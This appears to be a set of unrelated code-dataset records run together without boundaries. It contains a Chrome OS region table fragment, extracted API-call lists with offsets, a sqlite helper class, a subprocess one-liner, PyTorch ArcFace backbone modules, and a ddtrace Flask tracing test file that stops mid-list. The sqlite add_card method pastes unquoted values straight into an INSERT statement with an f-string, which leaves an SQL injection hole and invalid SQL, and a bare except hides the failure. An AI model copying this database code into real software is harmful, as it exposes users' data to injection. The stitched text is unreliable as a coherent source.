'de', _KML.ISO, 'Germany'), Region('fi', 'xkb:fi::fin', 'Europe/Helsinki', 'fi', _KML.ISO, 'Finland'), Region('fr', 'xkb:fr::fra', 'Europe/Paris', 'fr', _KML.ISO, 'France'), Region('gb', 'xkb:gb:extd:eng', 'Europe/London', 'en-GB', _KML.ISO, 'UK'), Region('ie', 'xkb:gb:extd:eng', 'Europe/Dublin', 'en-GB', _KML.ISO, 'Ireland'), Region('in', 'xkb:us::eng', 'Asia/Calcutta', 'en-US', _KML.ANSI, 'India'), Region('my', 'xkb:us::eng', 'Asia/Kuala_Lumpur', 'ms', _KML.ANSI, 'Malaysia'), Region('nl', 'xkb:us:intl:eng', 'Europe/Amsterdam', 'nl', _KML.ANSI, 'Netherlands'), Region('nordic', 'xkb:se::swe', 'Europe/Stockholm', 'en-US', _KML.ISO, 'Nordics', ('Unified SKU for Sweden, Norway, and Denmark. This defaults ' 'to Swedish keyboard layout, but starts with US English language ' 'for neutrality. Use if there is a single combined SKU for Nordic ' 'countries.')), Region('se', 'xkb:se::swe', 'Europe/Stockholm', 'sv', _KML.ISO, 'Sweden', ("Use this if there separate SKUs for Nordic countries (Sweden, " "Norway, and Denmark), or the device is only shipping to Sweden. " "If there is a single unified SKU, use 'nordic' instead.")), Region('sg', 'xkb:us::eng', 'Asia/Singapore', 'en-GB', _KML.ANSI, 'Singapore'), Region('us', 'xkb:us::eng', 'America/Los_Angeles', 'en-US', _KML.ANSI, 'United States'), ]
[ "json.loads", "telemetry.core.browser_finder.FindBrowser", "telemetry.core.backends.chrome.cros_interface.CrOSInterface", "telemetry.core.util.WaitFor", "os.path.dirname", "telemetry.unittest.options_for_unittests.GetCopy", "telemetry.core.extension_to_load.ExtensionToLoad", "logging.info" ]
[((561, 592), 'telemetry.unittest.options_for_unittests.GetCopy', 'options_for_unittests.GetCopy', ([], {}), '()\n', (590, 592), False, 'from telemetry.unittest import options_for_unittests\n'), ((609, 685), 'telemetry.core.backends.chrome.cros_interface.CrOSInterface', 'cros_interface.CrOSInterface', (['options.cros_remote', 'options.cros_ssh_identity'], {}), '(options.cros_remote, options.cros_ssh_identity)\n', (637, 685), False, 'from telemetry.core.backends.chrome import cros_interface\n'), ((1179, 1205), 'json.loads', 'json.loads', (['cryptohomeJSON'], {}), '(cryptohomeJSON)\n', (1189, 1205), False, 'import json\n'), ((1495, 1526), 'telemetry.unittest.options_for_unittests.GetCopy', 'options_for_unittests.GetCopy', ([], {}), '()\n', (1524, 1526), False, 'from telemetry.unittest import options_for_unittests\n'), ((1880, 1915), 'telemetry.core.browser_finder.FindBrowser', 'browser_finder.FindBrowser', (['options'], {}), '(options)\n', (1906, 1915), False, 'from telemetry.core import browser_finder\n'), ((4602, 4632), 'logging.info', 'logging.info', (['"""Locking screen"""'], {}), "('Locking screen')\n", (4614, 4632), False, 'import logging\n'), ((4714, 4757), 'logging.info', 'logging.info', (['"""Waiting for the lock screen"""'], {}), "('Waiting for the lock screen')\n", (4726, 4757), False, 'import logging\n'), ((5010, 5040), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['ScreenLocked', '(10)'], {}), '(ScreenLocked, 10)\n', (5022, 5040), False, 'from telemetry.core import util\n'), ((5149, 5186), 'logging.info', 'logging.info', (['"""Trying a bad password"""'], {}), "('Trying a bad password')\n", (5161, 5186), False, 'import logging\n'), ((5512, 5548), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['ErrorBubbleVisible', '(10)'], {}), '(ErrorBubbleVisible, 10)\n', (5524, 5548), False, 'from telemetry.core import util\n'), ((5645, 5670), 'logging.info', 'logging.info', (['"""Unlocking"""'], {}), "('Unlocking')\n", (5657, 5670), False, 'import logging\n'), ((5815, 5858), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['(lambda : not browser.oobe)', '(10)'], {}), '(lambda : not browser.oobe, 10)\n', (5827, 5858), False, 'from telemetry.core import util\n'), ((1657, 1770), 'telemetry.core.extension_to_load.ExtensionToLoad', 'extension_to_load.ExtensionToLoad', ([], {'path': 'extension_path', 'browser_type': 'options.browser_type', 'is_component': '(True)'}), '(path=extension_path, browser_type=options\n .browser_type, is_component=True)\n', (1690, 1770), False, 'from telemetry.core import extension_to_load\n'), ((1585, 1610), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1600, 1610), False, 'import os\n')]
import sqlite3 class Database: def get_connection(self): return sqlite3.connect("./db.sqlite") def add_card(self, card_title, card_text, card_link_text, card_link_url): con = self.get_connection() cur = con.cursor() create_table_query = "CREATE TABLE IF NOT EXISTS cards('card_title' VARCHAR," + \ " 'card_text' TEXT, 'card_link_text' VARCHAR, 'card_link_url' VARCHAR )" insert_data_query = f"INSERT INTO " + \ f"cards VALUES ({card_title}, {card_text}, {card_link_text}, {card_link_url})" try: cur.execute(create_table_query) cur.execute(insert_data_query) con.commit() except: print("an error has been occurred !")
[ "sqlite3.connect" ]
[((78, 108), 'sqlite3.connect', 'sqlite3.connect', (['"""./db.sqlite"""'], {}), "('./db.sqlite')\n", (93, 108), False, 'import sqlite3\n')]
import subprocess subprocess.Popen(['sh', '../Switches/Switch3_On.sh'])
[ "subprocess.Popen" ]
[((18, 71), 'subprocess.Popen', 'subprocess.Popen', (["['sh', '../Switches/Switch3_On.sh']"], {}), "(['sh', '../Switches/Switch3_On.sh'])\n", (34, 71), False, 'import subprocess\n')]
from collections import namedtuple import torch from torch.nn import (AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid) # yapf: disable """ ArcFace implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch) # isort:skip # noqa """ # yapf: enable class Flatten(Module): """Flatten Module.""" def forward(self, input): return input.view(input.size(0), -1) def l2_norm(input, axis=1): """l2 normalization. Args: input (torch.Tensor): The input tensor. axis (int, optional): Specifies which axis of input to calculate the norm across. Defaults to 1. Returns: Tensor: Tensor after L2 normalization per-instance. """ norm = torch.norm(input, 2, axis, True) output = torch.div(input, norm) return output class Bottleneck(namedtuple('Block', ['in_channel', 'depth', 'stride'])): """A named tuple describing a ResNet block.""" def get_block(in_channel, depth, num_units, stride=2): """Get a single block config. Args: in_channel (int): Input channels. depth (int): Output channels. num_units (int): Number of unit modules. stride (int, optional): Conv2d stride. Defaults to 2. Returns: list: A list of unit modules' config. """ return [Bottleneck(in_channel, depth, stride) ] + [Bottleneck(depth, depth, 1) for i in range(num_units - 1)] def get_blocks(num_layers): """Get block configs of backbone. Args: num_layers (int): Number of ConvBlock layers in backbone. Raises: ValueError: `num_layers` must be one of [50, 100, 152]. Returns: list: A list of block configs. """ if num_layers == 50: blocks = [ get_block(in_channel=64, depth=64, num_units=3), get_block(in_channel=64, depth=128, num_units=4), get_block(in_channel=128, depth=256, num_units=14), get_block(in_channel=256, depth=512, num_units=3) ] elif num_layers == 100: blocks = [ get_block(in_channel=64, depth=64, num_units=3), get_block(in_channel=64, depth=128, num_units=13), get_block(in_channel=128, depth=256, num_units=30), get_block(in_channel=256, depth=512, num_units=3) ] elif num_layers == 152: blocks = [ get_block(in_channel=64, depth=64, num_units=3), get_block(in_channel=64, depth=128, num_units=8), get_block(in_channel=128, depth=256, num_units=36), get_block(in_channel=256, depth=512, num_units=3) ] else: raise ValueError( 'Invalid number of layers: {}. Must be one of [50, 100, 152]'. format(num_layers)) return blocks class SEModule(Module): """Squeeze-and-Excitation Modules. Args: channels (int): Input channels. reduction (int): Intermediate channels reduction ratio. """ def __init__(self, channels, reduction): super(SEModule, self).__init__() self.avg_pool = AdaptiveAvgPool2d(1) self.fc1 = Conv2d( channels, channels // reduction, kernel_size=1, padding=0, bias=False) self.relu = ReLU(inplace=True) self.fc2 = Conv2d( channels // reduction, channels, kernel_size=1, padding=0, bias=False) self.sigmoid = Sigmoid() def forward(self, x): """Forward Function.""" module_input = x x = self.avg_pool(x) x = self.fc1(x) x = self.relu(x) x = self.fc2(x) x = self.sigmoid(x) return module_input * x class bottleneck_IR(Module): """Intermediate Resblock of bottleneck. Args: in_channel (int): Input channels. depth (int): Output channels. stride (int): Conv2d stride. """ def __init__(self, in_channel, depth, stride): """Intermediate Resblock of bottleneck. Args: in_channel (int): Input channels. depth (int): Output channels. stride (int): Conv2d stride. """ super(bottleneck_IR, self).__init__() if in_channel == depth: self.shortcut_layer = MaxPool2d(1, stride) else: self.shortcut_layer = Sequential( Conv2d(in_channel, depth, (1, 1), stride, bias=False), BatchNorm2d(depth)) self.res_layer = Sequential( BatchNorm2d(in_channel), Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False), PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False), BatchNorm2d(depth)) def forward(self, x): """Forward function.""" shortcut = self.shortcut_layer(x) res = self.res_layer(x) return res + shortcut class bottleneck_IR_SE(Module): """Intermediate Resblock of bottleneck with SEModule. Args: in_channel (int): Input channels. depth (int): Output channels. stride (int): Conv2d stride. """ def __init__(self, in_channel, depth, stride): super(bottleneck_IR_SE, self).__init__() if in_channel == depth: self.shortcut_layer = MaxPool2d(1, stride) else: self.shortcut_layer = Sequential( Conv2d(in_channel, depth, (1, 1), stride, bias=False), BatchNorm2d(depth)) self.res_layer = Sequential( BatchNorm2d(in_channel), Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False), PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False), BatchNorm2d(depth), SEModule(depth, 16)) def forward(self, x): """Forward function.""" shortcut = self.shortcut_layer(x) res = self.res_layer(x) return res + shortcut
[ "torch.nn.Sigmoid", "torch.nn.ReLU", "collections.namedtuple", "torch.nn.BatchNorm2d", "torch.nn.Conv2d", "torch.nn.PReLU", "torch.norm", "torch.nn.MaxPool2d", "torch.nn.AdaptiveAvgPool2d", "torch.div" ]
[((890, 944), 'collections.namedtuple', 'namedtuple', (['"""Block"""', "['in_channel', 'depth', 'stride']"], {}), "('Block', ['in_channel', 'depth', 'stride'])\n", (900, 944), False, 'from collections import namedtuple\n'), ((784, 816), 'torch.norm', 'torch.norm', (['input', '(2)', 'axis', '(True)'], {}), '(input, 2, axis, True)\n', (794, 816), False, 'import torch\n'), ((830, 852), 'torch.div', 'torch.div', (['input', 'norm'], {}), '(input, norm)\n', (839, 852), False, 'import torch\n'), ((3144, 3164), 'torch.nn.AdaptiveAvgPool2d', 'AdaptiveAvgPool2d', (['(1)'], {}), '(1)\n', (3161, 3164), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3184, 3261), 'torch.nn.Conv2d', 'Conv2d', (['channels', '(channels // reduction)'], {'kernel_size': '(1)', 'padding': '(0)', 'bias': '(False)'}), '(channels, channels // reduction, kernel_size=1, padding=0, bias=False)\n', (3190, 3261), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3343, 3361), 'torch.nn.ReLU', 'ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (3347, 3361), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3381, 3458), 'torch.nn.Conv2d', 'Conv2d', (['(channels // reduction)', 'channels'], {'kernel_size': '(1)', 'padding': '(0)', 'bias': '(False)'}), '(channels // reduction, channels, kernel_size=1, padding=0, bias=False)\n', (3387, 3458), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((3543, 3552), 'torch.nn.Sigmoid', 'Sigmoid', ([], {}), '()\n', (3550, 3552), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4378, 4398), 'torch.nn.MaxPool2d', 'MaxPool2d', (['(1)', 'stride'], {}), '(1, stride)\n', (4387, 4398), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4615, 4638), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['in_channel'], {}), '(in_channel)\n', (4626, 4638), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4652, 4708), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(3, 3)', '(1, 1)', '(1)'], {'bias': '(False)'}), '(in_channel, depth, (3, 3), (1, 1), 1, bias=False)\n', (4658, 4708), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4722, 4734), 'torch.nn.PReLU', 'PReLU', (['depth'], {}), '(depth)\n', (4727, 4734), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4736, 4787), 'torch.nn.Conv2d', 'Conv2d', (['depth', 'depth', '(3, 3)', 'stride', '(1)'], {'bias': '(False)'}), '(depth, depth, (3, 3), stride, 1, bias=False)\n', (4742, 4787), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4801, 4819), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (4812, 4819), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5379, 5399), 'torch.nn.MaxPool2d', 'MaxPool2d', (['(1)', 'stride'], {}), '(1, stride)\n', (5388, 5399), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5616, 5639), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['in_channel'], {}), '(in_channel)\n', (5627, 5639), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5653, 5709), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(3, 3)', '(1, 1)', '(1)'], {'bias': '(False)'}), '(in_channel, depth, (3, 3), (1, 1), 1, bias=False)\n', (5659, 5709), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5723, 5735), 'torch.nn.PReLU', 'PReLU', (['depth'], {}), '(depth)\n', (5728, 5735), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5737, 5788), 'torch.nn.Conv2d', 'Conv2d', (['depth', 'depth', '(3, 3)', 'stride', '(1)'], {'bias': '(False)'}), '(depth, depth, (3, 3), stride, 1, bias=False)\n', (5743, 5788), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5802, 5820), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (5813, 5820), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4475, 4528), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(1, 1)', 'stride'], {'bias': '(False)'}), '(in_channel, depth, (1, 1), stride, bias=False)\n', (4481, 4528), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((4546, 4564), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (4557, 4564), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5476, 5529), 'torch.nn.Conv2d', 'Conv2d', (['in_channel', 'depth', '(1, 1)', 'stride'], {'bias': '(False)'}), '(in_channel, depth, (1, 1), stride, bias=False)\n', (5482, 5529), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n'), ((5547, 5565), 'torch.nn.BatchNorm2d', 'BatchNorm2d', (['depth'], {}), '(depth)\n', (5558, 5565), False, 'from torch.nn import AdaptiveAvgPool2d, BatchNorm2d, Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\n')]
# -*- coding: utf-8 -*- from ddtrace.compat import PY2 from ddtrace.constants import ANALYTICS_SAMPLE_RATE_KEY from ddtrace.contrib.flask.patch import flask_version from ddtrace.ext import http from ddtrace.propagation.http import HTTP_HEADER_TRACE_ID, HTTP_HEADER_PARENT_ID from flask import abort from . import BaseFlaskTestCase from ...utils import assert_span_http_status_code base_exception_name = 'builtins.Exception' if PY2: base_exception_name = 'exceptions.Exception' class FlaskRequestTestCase(BaseFlaskTestCase): def test_request(self): """ When making a request We create the expected spans """ @self.app.route('/') def index(): return 'Hello Flask', 200 res = self.client.get('/') self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') spans = self.get_spans() self.assertEqual(len(spans), 8) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.index', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, 'GET /') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 0) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('flask.endpoint'), 'index') self.assertEqual(req_span.get_tag('flask.url_rule'), '/') self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/') assert_span_http_status_code(req_span, 200) assert http.QUERY_STRING not in req_span.meta # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.index') self.assertEqual(handler_span.resource, '/') self.assertEqual(req_span.error, 0) def test_request_query_string_trace(self): """Make sure when making a request that we create the expected spans and capture the query string.""" @self.app.route('/') def index(): return 'Hello Flask', 200 with self.override_http_config('flask', dict(trace_query_string=True)): self.client.get('/?foo=bar&baz=biz') spans = self.get_spans() # Request tags assert spans[0].get_tag(http.QUERY_STRING) == 'foo=bar&baz=biz' def test_analytics_global_on_integration_default(self): """ When making a request When an integration trace search is not event sample rate is not set and globally trace search is enabled We expect the root span to have the appropriate tag """ @self.app.route('/') def index(): return 'Hello Flask', 200 with self.override_global_config(dict(analytics_enabled=True)): res = self.client.get('/') self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') root = self.get_root_span() root.assert_matches( name='flask.request', metrics={ ANALYTICS_SAMPLE_RATE_KEY: 1.0, }, ) for span in self.spans: if span == root: continue self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY)) def test_analytics_global_on_integration_on(self): """ When making a request When an integration trace search is enabled and sample rate is set and globally trace search is enabled We expect the root span to have the appropriate tag """ @self.app.route('/') def index(): return 'Hello Flask', 200 with self.override_global_config(dict(analytics_enabled=True)): with self.override_config('flask', dict(analytics_enabled=True, analytics_sample_rate=0.5)): res = self.client.get('/') self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') root = self.get_root_span() root.assert_matches( name='flask.request', metrics={ ANALYTICS_SAMPLE_RATE_KEY: 0.5, }, ) for span in self.spans: if span == root: continue self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY)) def test_analytics_global_off_integration_default(self): """ When making a request When an integration trace search is not set and sample rate is set and globally trace search is disabled We expect the root span to not include tag """ @self.app.route('/') def index(): return 'Hello Flask', 200 with self.override_global_config(dict(analytics_enabled=False)): res = self.client.get('/') self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') root = self.get_root_span() self.assertIsNone(root.get_metric(ANALYTICS_SAMPLE_RATE_KEY)) for span in self.spans: if span == root: continue self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY)) def test_analytics_global_off_integration_on(self): """ When making a request When an integration trace search is enabled and sample rate is set and globally trace search is disabled We expect the root span to have the appropriate tag """ @self.app.route('/') def index(): return 'Hello Flask', 200 with self.override_global_config(dict(analytics_enabled=False)): with self.override_config('flask', dict(analytics_enabled=True, analytics_sample_rate=0.5)): res = self.client.get('/') self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') root = self.get_root_span() root.assert_matches( name='flask.request', metrics={ ANALYTICS_SAMPLE_RATE_KEY: 0.5, }, ) for span in self.spans: if span == root: continue self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY)) def test_distributed_tracing(self): """ When making a request When distributed tracing headers are present We create the expected spans """ @self.app.route('/') def index(): return 'Hello Flask', 200 # Default: distributed tracing enabled res = self.client.get('/', headers={ HTTP_HEADER_PARENT_ID: '12345', HTTP_HEADER_TRACE_ID: '678910', }) self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') # Assert parent and trace id are properly set on the root span span = self.find_span_by_name(self.get_spans(), 'flask.request') self.assertEqual(span.trace_id, 678910) self.assertEqual(span.parent_id, 12345) # Explicitly enable distributed tracing with self.override_config('flask', dict(distributed_tracing_enabled=True)): res = self.client.get('/', headers={ HTTP_HEADER_PARENT_ID: '12345', HTTP_HEADER_TRACE_ID: '678910', }) self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') # Assert parent and trace id are properly set on the root span span = self.find_span_by_name(self.get_spans(), 'flask.request') self.assertEqual(span.trace_id, 678910) self.assertEqual(span.parent_id, 12345) # With distributed tracing disabled with self.override_config('flask', dict(distributed_tracing_enabled=False)): res = self.client.get('/', headers={ HTTP_HEADER_PARENT_ID: '12345', HTTP_HEADER_TRACE_ID: '678910', }) self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') # Assert parent and trace id are properly set on the root span span = self.find_span_by_name(self.get_spans(), 'flask.request') self.assertNotEqual(span.trace_id, 678910) self.assertIsNone(span.parent_id) def test_request_query_string(self): """ When making a request When the request contains a query string We create the expected spans """ @self.app.route('/') def index(): return 'Hello Flask', 200 res = self.client.get('/', query_string=dict(hello='flask')) self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'Hello Flask') spans = self.get_spans() self.assertEqual(len(spans), 8) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.index', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') # Note: contains no query string self.assertEqual(req_span.resource, 'GET /') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 0) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('flask.endpoint'), 'index') # Note: contains no query string self.assertEqual(req_span.get_tag('flask.url_rule'), '/') self.assertEqual(req_span.get_tag('http.method'), 'GET') # Note: contains no query string self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/') assert_span_http_status_code(req_span, 200) # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.index') # Note: contains no query string self.assertEqual(handler_span.resource, '/') self.assertEqual(req_span.error, 0) def test_request_unicode(self): """ When making a request When the url contains unicode We create the expected spans """ @self.app.route(u'/üŋïĉóđē') def unicode(): return 'üŋïĉóđē', 200 res = self.client.get(u'/üŋïĉóđē') self.assertEqual(res.status_code, 200) self.assertEqual(res.data, b'\xc3\xbc\xc5\x8b\xc3\xaf\xc4\x89\xc3\xb3\xc4\x91\xc4\x93') spans = self.get_spans() self.assertEqual(len(spans), 8) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.unicode', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, u'GET /üŋïĉóđē') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 0) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('flask.endpoint'), 'unicode') self.assertEqual(req_span.get_tag('flask.url_rule'), u'/üŋïĉóđē') self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), u'http://localhost/üŋïĉóđē') assert_span_http_status_code(req_span, 200) # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.unicode') self.assertEqual(handler_span.resource, u'/üŋïĉóđē') self.assertEqual(req_span.error, 0) def test_request_404(self): """ When making a request When the requested endpoint was not found We create the expected spans """ res = self.client.get('/not-found') self.assertEqual(res.status_code, 404) spans = self.get_spans() self.assertEqual(len(spans), 9) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'flask.handle_user_exception', 'flask.handle_http_exception', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, 'GET 404') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 0) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/not-found') assert_span_http_status_code(req_span, 404) # Dispatch span dispatch_span = spans[3] self.assertEqual(dispatch_span.service, 'flask') self.assertEqual(dispatch_span.name, 'flask.dispatch_request') self.assertEqual(dispatch_span.resource, 'flask.dispatch_request') self.assertEqual(dispatch_span.error, 1) self.assertTrue(dispatch_span.get_tag('error.msg').startswith('404 Not Found')) self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound') def test_request_abort_404(self): """ When making a request When the requested endpoint calls `abort(404)` We create the expected spans """ @self.app.route('/not-found') def not_found(): abort(404) res = self.client.get('/not-found') self.assertEqual(res.status_code, 404) spans = self.get_spans() self.assertEqual(len(spans), 10) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.not_found', 'flask.handle_user_exception', 'flask.handle_http_exception', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, 'GET /not-found') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 0) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/not-found') assert_span_http_status_code(req_span, 404) self.assertEqual(req_span.get_tag('flask.endpoint'), 'not_found') self.assertEqual(req_span.get_tag('flask.url_rule'), '/not-found') # Dispatch span dispatch_span = spans[3] self.assertEqual(dispatch_span.service, 'flask') self.assertEqual(dispatch_span.name, 'flask.dispatch_request') self.assertEqual(dispatch_span.resource, 'flask.dispatch_request') self.assertEqual(dispatch_span.error, 1) self.assertTrue(dispatch_span.get_tag('error.msg').startswith('404 Not Found')) self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound') # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.not_found') self.assertEqual(handler_span.resource, '/not-found') self.assertEqual(handler_span.error, 1) self.assertTrue(handler_span.get_tag('error.msg').startswith('404 Not Found')) self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(handler_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound') def test_request_500(self): """ When making a request When the requested endpoint raises an exception We create the expected spans """ @self.app.route('/500') def fivehundred(): raise Exception('500 error') res = self.client.get('/500') self.assertEqual(res.status_code, 500) spans = self.get_spans() self.assertEqual(len(spans), 9) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 